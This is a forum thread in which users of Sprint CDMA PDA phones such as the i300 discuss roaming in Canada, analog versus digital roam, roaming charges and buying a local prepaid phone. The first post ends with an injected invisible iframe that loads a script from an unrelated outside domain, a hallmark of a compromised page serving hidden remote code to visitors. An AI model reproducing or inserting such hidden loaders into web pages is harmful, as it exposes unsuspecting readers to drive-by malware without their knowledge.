+ Reply to Thread
    K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

Roaming in Ontario, Canada

BTW, have you ever been to Canada with your i300. or other CDMA PDAPhone (Kyocera 6035, 7135, Treo 300, Toshiba 2032, others)?

Curious about how the connectivity works, since SprintCanada is just a branding for a third-party GSM system. Therefore the i300 (and all other CDMA PDAPhones) have to get service via roaming.

It's important to know, _if_ you could not get signal, if you had SprintPCS or Digital Only set in Phone Preferences.

Thank you for your experience shared.

And, thank you kindly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sprint pcs beta tester macmetal666's Avatar
    your phone will only work if cellular one towers are present(or affiliate since i think theve changed their name again) you must ahve your phone set to analog only when you do this or your phone will still try searching for a sprint tower. actually your best,if your realy going to use the phone there, is to just buy a prepaid cell phone when you get there. when you are done with the extra romaing charges and ld charges, which will NOT BE COVERED UNDER ANY SPRINTPCS PLAN (its not, really) plus the exchange rate of .65 on the 1.00 in favor of US, .....you get the point...

a preepaid cell phone will run you about $45 plus 25 or 30 for every 50 minutes. its far cheaper then the 2.50 a minute you will pay for using the i300.............
    my i500 is more obsolete than your ti-99 or apple IIe

ps i am originally from Timmins .ONT.CA where the signal was poor at best for anything.......

Service in Canada

I just recently spent a couple of weeks in northern New Brunswick. My I300 was in analog roam the whole time (which is better than 3 years ago, when I couldn't even get that). Then went to Ottawa for a couple of weeks and spent the whole time in digital roam (again, an upgrade over analog only 3 years ago).

sprint ca is currently working on buying the rights to ottawa this will be their first canada landing on cdma.